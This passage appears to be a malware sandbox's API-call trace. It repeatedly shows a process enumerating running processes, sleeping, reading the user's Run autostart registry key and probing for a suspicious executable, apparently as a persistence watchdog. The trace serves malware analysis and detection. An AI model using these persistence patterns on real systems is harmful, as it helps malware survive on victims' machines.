returned 0xc000003a [0284.113] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0284.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0284.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0284.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0284.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0284.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0284.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.250] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0284.251] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0284.253] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0284.253] NtClose (Handle=0x338) returned 0x0 [0284.253] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.253] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.253] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0284.253] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.253] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.253] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0284.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0284.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0284.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0284.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0284.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0284.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.371] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0284.373] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0284.374] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0284.374] NtClose (Handle=0x338) returned 0x0 [0284.374] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.374] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.374] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0284.374] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.374] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.375] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0284.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0284.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0284.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0284.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0284.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0284.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.524] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0284.526] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0284.526] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0284.526] NtClose (Handle=0x338) returned 0x0 [0284.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.526] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.526] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0284.527] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.527] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.527] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0284.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0284.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0284.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0284.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0284.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0284.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.685] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0284.687] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0284.689] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0284.689] NtClose (Handle=0x338) returned 0x0 [0284.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.689] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.689] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0284.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.689] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.689] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0284.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0284.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0284.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0284.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0284.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0284.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.868] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0284.869] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0284.871] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0284.871] NtClose (Handle=0x338) returned 0x0 [0284.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.871] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.872] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0284.872] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.872] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.872] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0284.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0284.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0284.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0284.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0284.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0285.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.067] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0285.070] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0285.071] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0285.071] NtClose (Handle=0x338) returned 0x0 [0285.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.071] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.072] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0285.072] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.072] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.072] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0285.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0285.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0285.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0285.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0285.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0285.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.258] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0285.259] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0285.261] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0285.261] NtClose (Handle=0x338) returned 0x0 [0285.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 